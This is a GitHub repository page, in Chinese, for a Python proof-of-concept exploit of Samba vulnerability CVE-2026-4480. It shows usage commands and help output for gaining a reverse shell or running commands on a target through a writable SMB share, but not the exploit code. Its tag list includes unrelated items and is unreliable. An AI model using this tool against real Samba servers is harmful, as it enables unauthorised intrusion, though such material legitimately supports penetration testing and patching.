Vusal777/CVE-2026-4480-exploit-poc
GitHub: Vusal777/CVE-2026-4480-exploit-poc
针对 Samba 服务 CVE-2026-4480 漏洞的 Python PoC 利用脚本,支持匿名或凭据登录后通过可写 SMB 共享执行远程命令并获取反弹 Shell。
Stars: 0 | Forks: 0
### `用法`:
##### 匿名登录:
`python3 exploit.py --lhost --lport -t -N (用于匿名登录)`
##### 通过凭据登录:
`python3 exploit.py --lhost --lport -t -u -p `
```
[!] Error: the following arguments are required: -s/--sharename
[*] Note: if user is anonymous and no password, then just add -N without -u or -p
##### 用法:
exploit.py [-h] -t TARGET -Lh LHOST -Lp LPORT -s SHARENAME [-c CMD] (-N | -u USERNAME) [-p PASSWORD]
options:
-h, --help show this help message and exit
-t, --target TARGET target Samba host/IP (rhost)
-Lh, --lhost LHOST your listener IP (e.g. tun0)
-Lp, --lport LPORT your listener port
-s, --sharename SHARENAME (Writable SMB share / printer name)
-c, --cmd CMD run a specific shell command instead of a reverse shell
-N, --no-pass Anonymous / guest login
-u, --username USERNAME (Username for authentication)
-p, --password PASSWORD (Password for authentication)```
```
标签:PoC, Python, Samba, Web报告查看器, XXE攻击, 威胁模拟, 安全, 无后门, 暴力破解, 超时处理, 逆向工具